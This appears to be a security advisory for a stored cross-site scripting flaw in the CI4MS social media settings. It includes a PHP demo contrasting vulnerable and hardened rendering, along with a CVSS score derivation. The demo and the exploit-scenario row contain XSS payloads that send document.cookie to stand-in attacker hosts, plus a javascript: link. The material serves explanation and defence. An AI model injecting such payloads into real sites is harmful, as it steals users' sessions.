Severity by source
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS Vector (GitHub Advisory)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
Description (GitHub Advisory)
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings - Social Media Management. Multiple configuration fields, including Social Media and Social Media Link, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Analysis (AI)
Stored cross-site scripting (XSS) in CI4MS prior to version 0.31.0.0 allows an authenticated high-privilege administrator to inject script through the unvalidated System Settings - Social Media Management configuration fields. Attacker-controlled input is stored server-side and later rendered without output encoding, so the script runs in the browser of any user who subsequently views the page where those values are rendered. …
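As an added illustration (not CI4's own code and not taken from the advisory), the stand-alone PHP script below reproduces the pattern described above, social media settings saved verbatim and interpolated straight into HTML, beside a hardened rendering path. The settings array, field names, payload and attacker URLs are constructed for the example; CodeIgniter 4's `esc()` view helper (`esc($v)` for element text, `esc($v, 'attr')` for attribute values) performs the same context-aware encoding that plain `htmlspecialchars` does here, which keeps the file runnable without the framework.

```php
<?php
// Added example, not CI4's own code. Demonstrates the stored-XSS pattern
// from the advisory (settings stored verbatim, rendered without encoding)
// next to a hardened rendering path. Store layout and field names are assumed.

declare(strict_types=1);

// Constructed "stored settings", as a malicious or compromised admin might have saved them.
$settings = [
    ['social_media' => 'Mastodon',
     'social_media_link' => 'https://mastodon.example/@ci4ms'],
    ['social_media' => '<img src=x onerror="fetch(\'http://attacker.example/steal?c=\'+document.cookie)">',
     'social_media_link' => 'javascript:alert(document.domain)'],
];

// Vulnerable: raw interpolation, the same as <?= $row['social_media'] ?> in a view.
// The stored <img onerror> payload reaches the browser intact and fires on load.
function renderSocialLinksVulnerable(array $rows): string
{
    $out = '';
    foreach ($rows as $row) {
        $out .= '<a href="' . $row['social_media_link'] . '">' . $row['social_media'] . "</a>\n";
    }
    return $out;
}

// Context-aware HTML encoding for text and quoted attribute values.
// In a CI4 view, esc($v) / esc($v, 'attr') does this job.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encoding alone does not make an href safe: "javascript:alert(1)" contains no
// HTML-special characters and survives htmlspecialchars unchanged, so the URL
// scheme of the Social Media Link field must be allowlisted as well.
function isAllowedSocialUrl(string $url): bool
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!is_string($scheme)) {
        return false; // relative, scheme-less or unparseable values are not accepted
    }
    return in_array(strtolower($scheme), ['http', 'https'], true);
}

// Hardened: every stored value is encoded for the context it lands in, and a
// link with a disallowed scheme is dropped instead of rendered.
function renderSocialLinksSafe(array $rows): string
{
    $out = '';
    foreach ($rows as $row) {
        $link = $row['social_media_link'];
        if (!isAllowedSocialUrl($link)) {
            $out .= '<span>' . h($row['social_media']) . "</span>\n";
            continue;
        }
        $out .= '<a href="' . h($link) . '" rel="noopener">' . h($row['social_media']) . "</a>\n";
    }
    return $out;
}

echo "--- vulnerable ---\n", renderSocialLinksVulnerable($settings);
echo "--- hardened ---\n", renderSocialLinksSafe($settings);
```

Run it with the `php` CLI and compare the two outputs: the hardened path emits the payload as inert `&lt;img ...&gt;` text and omits the `javascript:` link entirely. The scheme allowlist in `isAllowedSocialUrl()` is the part a pure output-encoding fix misses; apply the same check server-side when the setting is saved, so a bad value never reaches the store in the first place.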
Vulnerability Assessment (AI)
| Section | Assessment |
| --- | --- |
| Risk Assessment | The CVSS v3.1 base score of 4.7 reflects a network-reachable vulnerability with low attack complexity and no user interaction, but a high privilege requirement (PR:H), with low confidentiality, integrity, and availability impact. … |
| Exploit Scenario | An authenticated administrator (PR:H) opens the CI4MS System Settings panel and navigates to the Social Media Management section. Rather than entering a legitimate social media account name or URL, the administrator saves a script payload such as `<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">` in the Social Media field. … |
| Remediation | Vendor-released patch: upgrade to CI4MS version 0.31.0.0 or later. … |
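Worked derivation of the 4.7 base score from the vector above, added here as a check using the CVSS v3.1 specification constants (AV:N = 0.85, AC:L = 0.77, PR:H with scope unchanged = 0.27, UI:N = 0.85, C/I/A:L = 0.22); this is not part of the original page:

$$
\begin{aligned}
\text{ISS} &= 1 - (1-0.22)(1-0.22)(1-0.22) = 0.5254 \\
\text{Impact} &= 6.42 \times \text{ISS} = 3.3734 \quad (\text{S:U}) \\
\text{Exploitability} &= 8.22 \times 0.85 \times 0.77 \times 0.27 \times 0.85 = 1.2347 \\
\text{Base} &= \mathrm{Roundup}\big(\min(3.3734 + 1.2347,\ 10)\big) = \mathrm{Roundup}(4.6081) = 4.7
\end{aligned}
$$

Had the scope been Changed, PR:H would weigh 0.50 instead of 0.27 and the impact formula would differ, so the PR:H value above is the one valid only for S:U.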
References
EUVD-2026-18073
GHSA-gcfj-cf7j-vwgj